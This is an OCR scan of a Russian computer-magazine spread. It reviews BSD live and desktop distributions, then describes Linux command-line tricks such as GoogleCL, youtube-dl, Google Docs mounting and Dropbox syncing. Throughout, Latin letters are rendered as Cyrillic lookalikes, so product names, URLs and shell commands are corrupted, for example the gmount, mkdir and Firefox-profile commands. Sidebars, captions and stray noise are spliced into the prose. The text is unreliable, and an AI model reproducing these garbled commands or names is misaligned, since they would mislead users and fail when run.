• Шесть браузеров: Орега, РігеТох, СНготе, ОШо, ЕІіпкз, 
І-упх. 

• Почтовые программы БуІрИееб и ДАиП. 

• Редакторы Ьеафаб и Ѵіт. 

• Программы для общения Р$і, Іг$$і, СепІегІМ. 

Утилита для анализа и взлома беспроводных сетей 

аігсгаск-пд. 

• ѴРІЧ-клиенты орепѵрп, ррір-сііепі и ѵрпс. 

• Сетевые мониторы *га{$Ноѵѵ, Ьтоп, с1агк$*а*, ійор. 

• Программы для туннелирования Зргоху, зіиппеі и 
другие. 

• Сетевой анонимайзер ТОР. 

• Программы для удаленного управления іеіпеі, 
гсіезкіор и ѵпс. 

• Сетевой сканер птар. 

• Сканеры безопасности пе$$и$ и пікіо. 

• Снифферы \л/іге$Нагк и еПегсар. 

• Ю5 БпоіЪ 

• Антивирус СІатАѴ с графическим интерфейсом 
СІатТК. 

• Виртуальная машина ѴігіиаІВох. 

• Архиваторы для всех типов архивов. 

• Множество утилит для работы с жестким диском и 
восстановления/уничтожения данных. 

• Множество утилит для отладки и работы с различ- 
ными протоколами. 

Крометакого разнообразного набора программ, 

Егепгу включает в себя программу настройки системы 



ЕгепгуСоЫ (команда [гео пр также доступна из меню), 
которая позволяет настроить консоль (выбрать шрифты, 
настроить мышь и т.д.), выбрать метод подключения ксети 
(А05І_, І_АІ\І, ѴРІ\І) и настроить его, активировать различ- 
ные сетевые сервисы. Также в пункте меню «Настройка» 
есть две программы, которые устанавливают Ргепгу на 
жесткий диск или ІІЗВ-РІазЬ. Во всем остальном это 
стандартная ЕгееВЗО, которая умеет сама подстраивать- 
ся под оборудование, наполнена первоклассным софтом 
и обладает отличным графическим интерфейсом. Если 
ты хочешь опробовать РгееВЗО в качестве основной сис- 
темы, я бы рекомендовал остановиться именно на Ргепгу, 
которая, хоть и не имеет предустановленного КОЕ, рабо- 
тает из коробки и снабжена почти всем, что нужно гику. 

ВБОАпуѵѵНеге — безопас- 
ность превыше всего 

Домашняя страница: ЬзсІапуѵѵНеге.огд 
Последний релиз: 4.6 (5 ноября 2009) 
Операционная система: ОрепВЗО 4.6 

ВЗОАпуѵѵбеге — это ЫѵеСО на базе ОрепВЗО. Загрузка 
дистрибутива начинается с нажатия <Еп1ег> в ответ на 
приглашение загрузчика. В ОрепВЗО не предусмотрено 
какого-либо загрузочного меню, поэтому если появит- 
ся необходимость в отключении, например, АСРІ, это 
придется делать руками— с помощью ввода команд и 
изменения соответствующих переменных (Ьооі -с; сІізаЫе 
асрі; риіі). После загрузки ядра и начальной инициали- 
зации системы на экран будет выведено несколько воп- 
росов, на которые придется ответить, чтобы выполнить 
первоначальную настройку ОрепВЗО. Вопрос первый: 
выбор раскладки клавиатуры. Эта настройка касается 
только консоли, поэтому можно смело жать единицу, 
чтобы выбрать стандартную английскую клавиатуру. 
Вопрос второй: выбор временной зоны. Нет большого 
смысла в выборе временной зоны во время первой 
загрузки ЫѵеСО, поэтому можно просто ввести (ЗМТ, что 
означает время по Гринвичу. Вопрос третий: автоконфи- 
гурирование сети. Если в сети есть ОНСР-сервер, имеет 
смысл нажать <Еп1ег>, иначе — набираем «по» и вводим 
настройки вручную. 

После ответа на все вопросы на экран вывалится стан- 
дартный деііу с приглашением квводулогина. На ЫѵеСО 
активно два аккаунта: Ііѵе и гооі, о чем сказано в предуп- 
реждающем сообщении. При входе с именем Ііѵе будет 
запущен Х-сервер с любимым многими старожилами 
менеджером окон ІсеѴѴМ и весьма стильной обойной сло- 
готипом проекта в качестве фона. Набор доступных при- 
ложений невелик:терминал хіегт, файловый менеджер 
х[е, просмотрщикизображений хбі, музыкальный плеер 




> іпіо 

• В октябре 2006 года 
разработка РС-В50 
перешла под крыло 
компании іХзузЫтз, 
которая полностью 
оплачивает работу 
лидера и основателя 
проекта Криса Мура, 
а также занимается 
коммерческой 
поддержкой 
дистрибутива. 

•РВГпакеты РС-В50 
создаются на основе 
дерева портов 
РгееВЗО с помощью 
автоматизированной 
системы, поэтому 
в качестве 
и актуальности 
ПО можно 
не сомневаться. 

• После выпуска 
версии 1 .7 Питер 
Гофер, единственный 
активный 
разработчик 
дистрибутива 
ОезЫорВЗО, 
заявил о своем 
уходе из проекта. 
Однако 20 мая 

2010 года к проекту 
подключилась 
команда из 
четырех немецких 
разработчиков, 
которая намерена 
заниматься 
дальнейшей 
разработкой 
и усовершен- 
ствованием 
дистрибутива. 

•В декабре 2009 года 
Сергей Можайский 
выпустил свой 
последний релиз 
Егепгу — 1 .2- 
І_іІе. Еще ранее 
он заявлял, что 
не собирается 
продолжать развитие 
РгееВЗО. Версии 
1 .2 и 1.3 были 
выпущены Егором 
Вершининым. 
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Менеджер пакетов ОезкГорВЗО 



Рабочий стол Ргешу — пример эстетичного 
минимализма 



хттз, браузер Рігебох, почтовики ТЬи псіегбігсі и Мии, ІРС-клиентігззі, 
программы удаленного доступа к рабочему столу ОрепІЧХи ѴІЧС. 

Само собой разумеется, ЫѵеСО включает в себя все наработки про- 
екта ОрепВБО, включая ОрепББН и ОрепСѴБ. В остальном это даже 
не ознакомительный ЫѵеСО, а система, созданная поклонниками 
ОрепВБО для того, чтобы привычная среда всегда былау нихпри 
себе. 

ЛЬЬесІ — ЫеіВБО в кармане 

Домашняя страница: ѵѵѵѵѵѵ.ііЬЬесІ.огд 
Последний релиз 5.0.1 (27 августа 2009) 

Операционная система: ЫеіВБО 5.0.1 

Ужнезнаю, почему разработчики этого ЫѵеСО назвали его именно 
ЛЬЬесІ (что в переводе с английского означает «упрямились»), но 
нужно быть действительно упрямым человеком, чтобы заставить его 
работать. Дистрибутив наотрез отказался запускаться под ѴігІиаІВох 
и дети, но это не сильно испортило впечатление, поскольку систему 
все равно пришлось бы испытывать в полевыхусловиях на настоящем 
железе. Но с наскоку загрузить ОС на ноутбуке также неудалось, пото- 
му какс включенной подсистемой АСРІ ядро просто вываливалось в 
дебаггер. Во время повторной загрузки АСРІ пришлось принудитель- 
ноотключить, выбравтретий пунктменю. Втакой конфигурации ядро 
благополучно прошло все этапы инициализации и передало эстафету 
стартовым скриптам, которые включили и настроили сеть, используя 
ОНСР, а затем сгенерировали конфиг для Х.огд. После этого система 
передала управление командному интерпретатору кзЬ и начала при- 
ветливо мигать курсором. 

Попытка запустить иксы из консоли также неувенчаласьуспехом. 
Команда зіагіх вежливо сообщила, что не может найти подходящую 
конфигурацию для нестандартного широкоформатного дисплея, и за- 
вершилась. Пришлось открывать вторую консоль (кстати, это делается 
с помощью комбинации <СігІ+АИ+Р2>, а вовсе не <АИ+Р2>, какв Ыпих 
и ЕгееВБО), чтобы зайти под именем гооі и добавить в /еІс/Х1 1/хогд. 
соЫ необходимые строки (благо, ѵіт есть из коробки). Только после 
этого иксы запустились, и на экране появился стандартный рабочий 
стол ХТсе. 

Каких бы то ни было конфигураторов и ЫѵеСО -утилит в дистрибути- 
ве нет. По сути, это самая обычная ІЧеіВБО, на которую установлена 
графическая среда ХЫе и небольшой набор дополнительного софта, 
такого как редактор АЬіѴѴогсІ, шеллы Ьазб и гзб, редактор етасз, 
просмотрщикрбЫдокументов ерсРѵіеѵѵ, вьювер изображений ТеЬ, 
браузер РігеРохЗ, I М-кл иент рісідіп, мультимедиа-проигрыватель 
х^тесііа, атакже гсіезкіор, здиісі, зсгееп, ре, тс, трд321 и ѵѵдеі. Для 
беглого ознакомления с ІМеіВБО этого вполне достаточно, тем более, 
что все наиболее интересные особенности ОС находятся на уровне 
командной строки. 



РС-В5Р — РгееВБР 
для домохозяек 

Домашняя страница: ѵѵѵѵѵѵ.рсЬзсІ.огд 
Последний релиз 8.1 (20 июля 2010) 

Операционная система: РгееВБЭ 8.1 

РС-В50 — это десктопный вариант ЕгееВБО, разработанный сцелью 
сделать ВБО-систему близкой обычным пользователям операцион- 
кой, которую просто установить и начать использовать. Дистрибутив 
включает в себя удобный графический инсталлятор, основанный 
на В50 Іпзіаііег, оригинальную системууправления пакетами РВІ, 
упрощающую процессустановки пакета в систему, атакже несколько 
утилит для настройки установленной системы. 

Дистрибутив распространяется в виде 150-образа размером 3,5 Гб, 
который включает в себя саму ЕгееВБО, К0Е4 и языковые файлы для 
нескольких стран. При загрузке диска система проводит стандартную 
инициализацию, скрытую за стильнымтемным зріазб-скрином, за- 
пускает Х-сервер с менеджером окон РІихВох и программой установ- 
ки, выступающей в качестве графического фронт-энда к В50 Іпзіаііег. 
В отличие от прародителя, установка РС-В50 действительно очень 
проста и состоит из нескольких шагов: выбор языка установщика 
и самой операционной системы (среди вариантов есть и русский), 
выбор раскладки клавиатуры (но его лучше пропустить из-за одного 
неприятного бага, о котором будетсказано ниже), выбортипа уста- 
новки (новая или обновление), устанавливаемой системы (РС-В50 
способна установить и РгееВБО в ее чистом виде) и источника уста- 
новки (0Ѵ0 или сеть). Далее следует выбрать раздел жесткого диска 
или создать его (РС-В50 сама разделит раздел на слайсы, поэтому 
неподготовленный пользователь легко пройдет этот шаг), добавить 
пользователей, выбрать временную зону и опциональные компонен- 
ты (среди которых есть удобная графическая утилита для управления 
За і I), после чего начнется копирование файлов на диск. 

Загрузка установленной ОС происходит быстро, а по ее окончании 
запускается КйЕ4с модифицированным окном загрузки. Никаких 
дополнительных настроек, кроме предварительного подтверждения 
конфигурации монитора, делать не требуется, все работает, как часы, 
включая звуки сеть (если, конечно, в локалке есть ОНСР-сервер). 
Единственная проблема заключается втом, что при выборе альтер- 
нативной раскладки во время установки инсталлятор оставляет ее 
единственно доступной, так что придется самому настраивать пере- 
ключение через «Параметры системы». Сам КОЕ выглядит привыч- 
но, разработчики РС-В50 ничего кардинально не меняли, а только 
исправили некоторые иконки (включая меню запуска приложений) и 
применили другой стиль графического оформления. 

Установка пакетов производится с помощью специальной 
программы БоіНѵѵаге Мападег, иконка которой размещена прямо 
на рабочем столе. По принципу действия она очень похожа на 
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Менеджер пакетов РС-В5Р 



менеджер сІеЬ-пакетов зупарііс: ты выбираешь программу из 
соответствующего раздела, нажимаешь кнопку «Установить», и 
пакет скачивается и устанавливается в автоматическом режиме. 
Сами пакеты распространяются в виде специальных архивов с 
расширением рЬі, которые включают в себя программу вместе 
со всеми зависимостями. Установка программы происходит не в 
каталоговую структуру /изг/іосаі, какэто принято во РгееВЗй, а в 
обособленный подкаталог внутри каталога /Ргодгатз (вспомина- 
ем ѴѴіпсІоѵѵз и Мае 05 X). Это действительно удобно — используя 
РС-В50, ты никогда не встретишься с проблемой неудовлетво- 
ренных зависимостей или их конфликтов, а для удаления пакета 
сможешь просто стереть каталог программы из /Ргодгатз. 
Обновление пакетов происходит в полуавтоматическом режиме, 
также, как это сделано в большинстве дистрибутивов Ыпих (когда 
в репозитории появится обновление пакета, на экране будет 
отображено сообщение). 

В программе настройки КйЕ (пунктменю«Параметры системы»)™ 
найдешь несколько элементов, свойственныхтолько РС-В50. Во- 
первых, это пун кт «Настройка сети», через который можно выбрать 
используемый сетевой драйвер, назначить машине ІР-адрес и 
настроить другие параметры. Во-вторых, пункт«5уз1:ет Мападег», 
отображающий конфигурацию машины и позволяющий произвес- 
ти такие действия, какзагрузка дерева портов и исходных текстов 
РгееВЗО. В-третьих, пункт«5егѵісез Мападег», предназначенный для 
управления фоновыми сервисами. ОС включаетв себя множество 
скриптов и доработоксистемы инициализации РгееВ50,такчто с 
нестандартным оборудованием система работает гораздо лучше. 

ОезкТорВЗО — и вновь РгееВЗО 
для домохозяек 

Домашняя страница: ѵѵ\ллллс)е$кіорЬ$с1.пеТ 
Последний релиз: 1.7 (7 сентября 2009) 

Операционная система: РгееВЗО 7.2 

У проектов РС-В50 и ОезкІорВВО много общего. Обе операционные 
системы рассчитаны на применение рядовыми пользователями, 
обе оснащены графическим инсталлятором, основанным на В5й 
Іпзіаііег, в обеих ОС применяется графическое окружение на базе 
КОЕ. Отличие заключается втом, что разработчики ОезкІорВЗО не 
стали заново переизобретать системууправления пакетами, а просто 
включили в дистрибутив графические инструменты управления 
системой портов. 

ОезкІорВЗО распространяется в виде загрузочных 150-образов, 
размером чуть меньше двух гигабайт. После запуска диска на экране 
появляется уже знакомое меню загрузчика ЕгееВ50, которое лучше 
нетрогать и нажать <Еп1ег>. После завершения загрузки появится 
текстовое сообщение, предупреждающее, что выбранная конфигу- 
рация может не подойти для имеющегося монитора, и в этом случае 
следует нажать комбинацию <Сіг[+А11:+Васк5расе> для перехода к 
следующему разрешению. Сразу за ним возникаетокно с выбором 
типазагрузки (Ііѵе или іпзІаЩ, что весьма радует, таккакв РС-В50 
такого варианта не было. 



После выбора пункта Іпзіаіі появляется главное окно инсталлятора, 
с одной стороны очень похожее на аналогичное окно РС-В50, но с 
другой — более приятное глазу. Шаги установки все те же: выбор язы- 
ка, напутственное сообщение, информация об оборудовании, выбор 
типа установки (апдейт или обычная), вариантустановки (с диска 
или сетевой), установка загрузчика, разметка диска (втом числе в 
автоматическом режиме). Далее начинается процедура копирования 
файлов, по окончании которой происходит перезагрузка. 

После ребута ОезкІорВОО встречает пользователя бодрым «Добро 
пожаловать!» и предлагает провести начальную конфигурацию, 
которую нельзя отменить. Первый шаг конфигурации — установка 
дополнительных языковых пакетов. Их нужно выбрать из предла- 
гаемого списка, при этом конфигуратор оказался достаточно умен, 
чтобы запомнить выбор, сделанный во время установки системы, 
и самостоятельно отметить русский язык в списке. Второй шаг- 
добавление новых пользователей и установка пароля администра- 
тора. Третий шаг— включение ВВОВіаІз, что приведет котправке 
данных об установленной ОС и аппаратной конфигурации на сервера 
одноименного проекта. ВВОВіаІз — безобидный проект, который 
занимается сбором статистики установок В50-систем, поэтому о кон- 
фиденциальности можно не беспокоиться, тем более, что все данные 
отправляются анонимно. 

Все, теперь можно благополучно войти в систему под именем создан- 
ного ранее пользователя. Сразу оговорюсь, что ОезкІорВСО до сих 
пор использует КйЕ 3.5 в качестве окружения рабочего стола, поэтому 
к некоторому анахронизму нужно быть готовым (хотя для кого-то это 
будет плюсом). В общих чертах рабочий стол выглядит какобычный 
КйЕ, однако, взглянув на трей, можно увидеть две иконки, одна из ко- 
торых вызывает конфигуратор сети, а вторая позволяет монтировать 
накопители. Установка ПО осуществляется с помощью программы 
с очевидным названием «Программное обеспечение (ПО)», иконку 
которой можно найти на рабочем столе. Она работает напрямую с 
системой портов и при первом запуске предлагаетскачать это самое 
дерево портов из интернета (что может занять достаточно длительное 
время). 

Из ПО, установленного поумолчанию, можно отметить офисный 
пакет 0 реп ОШ се 3.1 .1 , окружение Заѵа 5Е6, проигрыватель Атагок, 
браузер Рігебох и графический редактор Оітр. Также есть поддержка 
ОРІІВ в качестве основного загрузчика и графическая программа для 
его конфигурирования. 

Выводы 

Несмотря на славу о пера ци оно к «для своих», В5й могут быть 
и хорошими десктопными системами, для установки которых 
необязательно читать документацию и иметь постоянный доступ в 
интернет. Даже если брать в расчеточевидное отставание ЫѵеСО- 
вариантов ЫеШВй и 0репВ50 в плане интуитивного использо- 
вания, Егепгу, РС-В50 и ОезкІорВВО красноречиво доказывают, 
что В5й — это нетолько хорошая серверная ОС, но и прекрасный 
десктоп, который может быть даже проще и понятней многих дист- 
рибутивов Ыпих. □с 
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•Нестандартные подходы в личном опыте 



Сама природа операционных систем семейства ІЖІХ делает их 
очень гибкими ОС, которые способны на гораздо большее, чем мы 
привыкли думать. Во многих случаях сама операционка подталкивает 
пользователя к нестандартному мышлению и нахождению обходных 
путей решения каких-либо задач. Множество людей оказывалось 
в такой ситуации, и это толкало их на создание скриптов 
и программ, выполняющих обычные функции нестандартным и более 
эффективным путем. 

ЭТА СТАТЬЯ — СВОЕГО РОДА ОБЗОР ИЛИ, 

ЛУЧШЕ СКАЗАТЬ, ДНЕВНИК, ОПИСЫВАЮЩИЙ 
ЛИЧНЫЙ ОПЫТ ИСПОЛЬЗОВАНИЯ НЕСТАН- 
ДАРТНОГО СОФТА В ПОВСЕДНЕВНОЙ ЖИЗНИ 
ЛИНУКСОИДА. Многие из описанных в статье 
программ и трюков используются мной еже- 
дневно и зарекомендовали себя отличными 
инструментами, значительно упрощающими 
жизнь. 

бооаіе за пределами 
браузера 

Соодіе вездесущ, из поисковой системы он 
превратился в огромную, живущую своей 
жизнью инфраструктуру, которая пытается 
проникнуть во все аспекты жизни просто- 
го интернет-зависимого человека. Соодіе 
существенно упрощает нашу жизнь, позволяя 
получить доступ ко всем благам современ- 



ного интернета с помощью единственного 
аккаунта. Но можно ли сделать доступ катим 
благам за пределами окна браузера? Можно 
ли задать вопрос поисковой системе и ска- 
чать видео из ѴоиІиЬе из окна терминала? Не 
такдавно эти вопросы я задал сам себе и был 
приятно удивлен. 

Сразу оговорись, что, как линуксоид старой 
школы, я не приемлю сложных графических 
интерфейсов и тяжеловесных приложений. 
Простые изящные утилиты командной строки 
вызывают во мне гораздо больше трепета, 
нежели сложные многофункциональные 
программы, зависящие от сотни библиотек. 
Поэтому именно в эту сторону велись мои 
поиски клиентов для сервисов Соодіе. 
Первым найденным мной инструментом ока- 
зался пакет под названием СоодІеСІ_ [ Ыір:// 
сосіе.доодіе.сопп/р/доодіесі/ ). опубликован- 



ный сотрудниками самого Соодіе. Будучи 
установленным в систему, он добавляет 
команду «доодіе», с помощью которой можно 
про из водить та кие действия, как публикация 
постов в блог, изменение событий в календа- 
ре, редактирование контактов С та і 1/АпсІ гоісі 
(эта ОС хранит всю адресную книгу на серве- 
рах Соодіе], управление документами Соодіе 
Оосз, добавление фотографий в альбомы 
Рісаза и публикация видео на ѴоиІиЬе. 
Команда принимает два обязательных аргу- 
мента и любое количество необязательных 
опций, следующих прямо за ними. В качестве 
первого аргумента выступает имя сервиса 
(рісаза, Ыоддег, уоиіибе, боев, сопіасіз или 
саіепбаг], а второго — действие, которое не- 
обходимо выполнить, используя этот сервис. 
Для каждого сервиса предусмотрен свой 
список возможных действий, например, для 
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> тксііг дбосе 

> дтоипі: гоЬпіпфдтаіІ .сот дбосз 

> сб дсіосз/ 

> 1з 

1з: саппоб ассезв іпзбаіі .рсі^.реі?: Іпѵаііб агдитепб 

14_ВІо**г_Іп*.гпо.оф 

2009.6^1 

Сотри! аііоп Огіб Овіпо.осір 
соругідЫ ,(КЙ 
(Ііііѵігу - баія * об* 

<_49*83*бс97ТаѲ . обі 
іац . о <11 

Монтируем боодіе Эосз с помощью дтоипі 




> іпіо 



В ОгорЬох можно 
было бы сохранить 
и профиль Ооодіе 
СЬготе, однако это 
не имеет смысла, так 
как он почти весь 
синхронизируется 
с серверами боодіе 
(по крайней мере, 
в разрабатываемой 
версии браузера]. 



Рісаза это деі, сгеаіе, Іізі, ІізІ-аІЬитз, Іад, розі и беіеіе, тогда какдля 
Віоддег — только розѣ, ѣад , Іізі и беіеіе. Опции используются для уточ- 
нения действий, например, --Ііііе задает за головок публикуемого поста 
для сервиса Віоддег или имя публикуемого видео на ѴоиІиЬе, а опция 
—гит тагу предназначена для добавления небольшого комментария 
к альбому Рісаза или к то му же видеоклипу. Вообще, это настолько 
простая и интуитивно понятная команда, что объяснять что-либо просто 
не имеетсмысла. Вместо этого я просто приведу примеры ее использо- 
вания: 

1. Публикация поста в блог с помощью Віоддег: 

$ доодіе Ыоддег розб --Ыод 'Ьіпихоіб' — Ііііе 
' СоодІеСЬ работает ! ' --бадз 'Ііпих, сіі ' 1 Открыл для 
себя СоодІеСЬ, Ыа-Ыа, Ыа ' 

2. Добавление события в календарь: 

$ доодіе саіепбаг абб 'День рождения Юли' 

3. Добавление контакта: 

$ доодіе сопбасбз абб 'Евгений Зобнин , 2оЬпіп@дшаі1 . сот ' 

4. Редактирование документа Соодіе Эосз (в дефолтовом 
редакторе, имя которого указано в переменной окружения 
ЕОІТОР): 

$ доодіе босз ебіб --бібіе "Список покупок" 

5. Добавление нового альбома в Рісаза (и заливка фоток): 

$ доодіе рісаза сгеабе --бібіе "Мои фотки" \ 

-/рбюбоз/* . зрд 

6. Публикация видео на ѴоиіиЬе: 

$ доодіе уоибиЪе розб --сабедогу Сошебу ужос . аѵі 

Во время первого обращения к сервису команда попросит ввести 
Ооодіе-логин (адрес почты на От а іі) и откроет страничку в браузере, на 
которой необходимо подтвердить права 6оодІеСІ_ на удаленное управ- 
ление. Последующие запуски команды будут проходить без вопросов. 
ОоодІеСЬ хорош, и его действительно удобно использовать для доступа 



к сервисам Ооодіе, но оказалось, что он лишен одной из важней- 
ших функций — возможности скачивать видео с ѴоиІиЬе. Пришлось 
продолжить поиски, в результате чего был открыт консольный ѴоиІиЬе- 
кл и ент под названием уоиІиЬе-61 ( Ы1р://Ы1Ьиске1.огд/гдЗ/уои1иЬе-б1/ 
уѵікі/Ноте ]. Эта до крайности простая утилита принимает в качестве 
параметра ссылку на видеоролик в интернете, закачивает его и поме- 
щает в текущий каталог. Кроме самого ѴоиІиЬе утилита умеет работать 
с теіасаіе.сот, Ооодіе Ѵібео, РЬоіоЬискеб, ѴаЬоо! ѵібео, Оаііутоііоп 
и некоторыми другими. Никакого конвертирования файла после его 
получения не производится, но нужно ли оно, когда все популярные 
II N IX- плееры умеют воспроизводить Иѵ-видео напрямую? 

В качестве дополнительных параметров команда принимает несколько 
опций, которые позволяютзадать имя пользователя и пароль, исполь- 
зуемые для доступа кзакрытым каналам (опции «-и» и «-р»), качество 
видео («-Ь» для самого лучшего качества или «-б» для Нй-видео], или 
просто продолжить докачку с прерванного места (опция «-с»]. Осталь- 
ныеопции не представляют особого интереса, но подробно описаны в 
т ап -странице. Вместо ІІРІ_ ролика можно использовать специальные 
ключевые слова для прямого поиска видео. Например, запустив коман- 
ду с параметром «уІзеагсЬ:НТС Оезіге», ты получишь самое релеван- 
тное видео, удовлетворяющее поисковому запросу НТО Оезіге. Для 
поиска по Ооодіе Ѵібео и ѴаЬоо! ѵібео предусмотрены ключевые слова 
«дѵзеагсЬ» и «уЬзеагсЬ». 

Дальнейшие поиски инструментов также принесли свои плоды в виде 
виртуальной файловой системы, позволяющей монтировать хранилище 
Ооодіе Эосз клокальному каталогу. Программа носит имя дбосз-тоипі- 
дік и может быть легко установлена в ІІЬипІи из стороннего репозито- 
рия. Чтобы сделать это, достаточно выполнить всего три команды: 

$ зибо абб-арб-герозібогу рра : босбогшо/рра 

$ зибо арб-деб ирбабе 

$ зибо арб-деб іпзбаіі дбосз-шоипб-дбк 

Далее ее можно найти в меню: Приложения Стандартные -> Ооодіе 
Оосз Соппесііоп. Ксожалению, в своей работе программа использует 
возможности бпоте и файлового менеджера ІЧаиІіІиз, что не слишком 
обрадует гиков и КОЕ’шников. Ксчастью, от графических ненужностей 
можно легко избавиться, установив только пакет доодіе-босз-із, кото- 
рый реализует саму файловую систему: 

$ зибо арб-деб іпзбаіі доодіе-босз-бз 

После этого в системе появятся две простых команды: дтоипі и дитоипі, 
которые можно использовать для подключения хранилища к системе: 
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ІЛМІХОЮ 



На низком уровне работа с веб-камерами в Ыпихпроисходитчерез 
стандартную ядерную подсистему«ѵібеоіюгІіпих»(ѵ41], а это значит, 
что для ее управления не нужно ничего, кроме консольного тріауег: 

тріауег Дѵ: //. 

Это пример вывода изображения с камеры на экран. Авотпример его 
записи вфайл: 

$ тепсосіег Дѵ:// -позоипсі -оѵс Іаѵс -ІаѵсорДз 
ѵсос!ес=іггіред -о ѵісіео.аѵі 

Если камера — не первое видеоустройство, необходимо использовать 
дополнительные опции: 



Управление ѵл/еЬ-камерой 
с помощью тріауег 



С ПМІІ-'.У піі'.Ч п:іті .т 

ЧЗ 

-ѵ аа тт^л 

/ Гыт г^і ГГі|1 
I 0*1-1 

і ■МѴЧ 1 ? 

•/ м Ьіріѵг 

ы ьь 

* - 



$ тріауег Дѵ: / / -Дѵ с1еѵісе=/с1еѵ/ѵі(іео1 



Интерфейс управления Выбираем музыку с 
Отоіе с обложкой альбо- помощью Стоіе 
ма в качестве фона 

$ тксііг дсіосз 

$ тоипД мыло@дтаі1 . сот пароль дсіосз 
$ 1з дсіосз 
$ дитоипД дсіосз 

ОгорЬох как инструмент 
синхронизации всего и вся 



браузере]. Примечательная особенность программы нетолько в ее 
кроссплатформенности (ѴѴіпбоѵѵз-версия носит имя КеерРазз), но и в 
том, что она позволяет работать с разными базами паролей одновре- 
менно и самостоятельно указывать их местоположение. Естественно, 
базу можно сохранить в каталог -/ОгорЬох, а затем открыть на другом 
компе. 

3. Синхронизация профиля Рі гебох. Как и любой другой браузер, при 
своем первом запуске Еігеіюх создаеттак называемый профиль, 
который используется для хранения всего, что породил (получил из 
интернета] браузер во время работы пользователя, включая пароли, 
закладки, кукисы, настройки и много чего еще. Профиль представляет 
собой каталог, поэтому его можно скопировать, забэкапить, унести на 
флешке и, естественно, выложить в ОгорЬох. Для этого необходимо 
создать специальный каталог внутри -/ОгорЬох: 



Когда-то открыв для себя ОгорЬох, я уже не мыслю жизни без этого 
несравнимого по удобству использования облачно го сервиса хране- 
ния данных. Он интуитивно прост в применении, имеет клиенты для 
всех популярных ОС (включая і 03 и Апбгоіб], не проситждать, пока 
данные будут за гружены на сервер, и чрезвычайно быстро производит 
синхронизацию файлов (надо отдать должное разработчикам сервиса, 
снабдившим ее системой поиска дубликатов по всему хранилищу и 
дельта-синхронизацией]. ОгорЬох можно использовать для переда- 
чи информации между компьютерами, бэкапа данных и совместной 
работы над проектами. Однако на этом возможности ОгорЬох не за- 
канчиваются, ведь он способен выполнять функции хостинга простых 
веб-сайтов, синхронизировать профили приложений и даже удаленно 
управлять ПК. Ниже я приведу наиболее интересные и полезные, но 
нетривиальные способы использования ОгорЬох в повседневной 
жизни. 

1 . Управление торрент-клиентом. Практически любой доступный 
для Ы п их торрент- клиент имеет функцию автоматической загрузки 
торрент-файлов из определенного каталога. Обычно она используется 
для того, чтобы заставить торрент-клиент качать файлы сразу после 
того, как они будут сохранены пользователем в определенный каталог, 
избегая лишних манипуляций с его стороны. ОгорЬох позволяет 
добавить кэтой функции возможность удаленной загрузки файлов, 
благодаря чему работающий сутки напролет домашний сервер будет 
автоматически начинать качатьторренты, загруженные на облачный 
жесткий диск. Для этого просто создай в каталоге -/ОгорЬох подка- 
талог Іюггепіз и настрой торрент-клиенттак, чтобы он автоматически 
скачивал все торренты, содержащиеся в этом каталоге. Теперь в 
каталог можно кидать файлы с любого ПК, имеющего доступ в сеть (ра- 
бочий или институтский комп, или даже смартфон], и быть уверенным, 
что файлы будут скачаны к твоему приходу домой. 

2 . Синхронизация паролей. Естьтакая замечательная программа под 
названием КееРаззХ, создана она для того, чтобы секьюрно хранить 
вселогины и пароли пользователя (включаяте, чтоон вводитв веб- 



$ тксііг -/РгорЬох/ іх р гоіііе 

Переместить в него все содержимое профиля (здесьХХХ — это случай- 
ная строка, которую придется скопировать или запомнить]: 

$ тѵ ~/ .тогіііа/ іігеіох/ХХХ . ЫеіаиІЦ/* -/БгорЬох/ іх/ 
ргоіііе 

И создать символическую ссылку, чтобы Еігеіюх ничего не заметил (XXX 
берем из предыдущей команды): 

$ 1п -з -/БгорЪох/ іх/ргоіііе ~/ . тогіііа/ іігеіох/ХХХ . 
сіеіаиід 

Теперь на всех остальных машинах, которые будут использовать 
этот профиль, необходимо удалить существующий профиль (гт -гі 
-/.тогіІІа/Ьгеіюх/КсІеіюиІі:) и создать симлинк, какэто было показано в 
последней команде. 

4 . Портативные приложения. Переносимые приложения, распро- 
страняемые в виде одного исполняемого файла, работающего на 
любой машине, существуют не только для ѴѴіпсІоѵѵз. Создатели сайта 
рогІаЫеІіпихаррз.огд предлагают своим посетителям выбор между 
сотней приложений, которые могут быть без установки запущены на 
любом Ыпих-десктопе. Положив необходимые приложения в ОгорЬох, 
ты добьешься того, что твои любимые программы всегда будут у тебя 
под рукой. 

5 . Удаленное управление Ьіп их- машиной. На одной из страниц ѵѵікі. 
деЫгорЬох.сопп выложен интересный набор скриптов, который поз- 
воляетуправлять Ыпих-машиной удаленно, не задействуя для этого 
ничего, кроме ОгорЬох. Реализация очень проста и занимает всего 
несколько строк на языке командного интерпретатора: сИ.деЫгорЬох. 
сот/и/30722/сігорЬох зегѵег.зЬ и бІ.деІсІгорЬох.сопп/и/30722/сІгорЬох 
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сІіепЕзЬ . Помещаем оба скрипта в каталог -/ОгорЬох, на сервере 
запускаем бгорЬох_5егѵег.зЬ, а на клиенте — сІгорЬох_сІіеп1.5Іі. В 
ответ на приглашение к вводу (Епіег Со ттапсі:) пишем свою команду, 
которую хотим выполнить на сервере, и получаем ее вывод на экран. 
Хитрость в том, что клиент просто записывает имя команды в файл, 
сервер его читает, выполняет команду и помещает результат в другой 
файл, который читает клиент и выводит на экран. Естественно, ни о 
какихуправляющих символахтерминала речи идти не может, поэтому 
о подсветке и тс придется забыть :). Вообще, все это — лишь частные 
примеры хранения конфигурационных и управляющих файлов на 
серверах ОгорЬох, список которых можно продолжать бесконечно. В 
конце концов, в ОгорЬох можно запихнуть и весь домашний каталог 
без каких-либо проблем и последствий для производительности, дру- 
гое дело, что не все могут доверить частную информацию в открытом 
виде посторонним. 

Рекурсивный Х-сервер 

Рядовой пользовательдомашнего линукса даже не подозревает, какая 
многофункциональная и сложная махина скрывается за легким полу- 
прозрачным интерфейсом его рабочего стола. Х-сервер считается од- 
ной из самых сложных программ, написанных на языке С, и имеет та кое 
количество различных подсистем и механизмов, что его разработчикам 
иногда кажется, что еще совсем чуть-чуть — и они уже не смогут разо- 
браться, что к чему. Х-сервер включает в себя драйвера для всех мысли- 
мых и немыслимых графических адаптеров и устройств ввода, способен 
на почти полное самоконфигурирование, умеетускорять производи- 
тельность приложений с помощью прямого доступа к памяти, но самое 
главное — обладает клиент-серверной архитектурой, которая позволяет 
не только удаленно обращаться к рабочему столу на основе иксов, но и, 
например, запустить несколько Х-серверов на одной машине. Когда-то 
мне понадобилось сделать множество скриншотов различных оконных 
менеджеров. Эта задача могла быть решена с помощью многократ- 
ного запуска иксов с различными записями в файле -/.хіпііхс. Мне это 
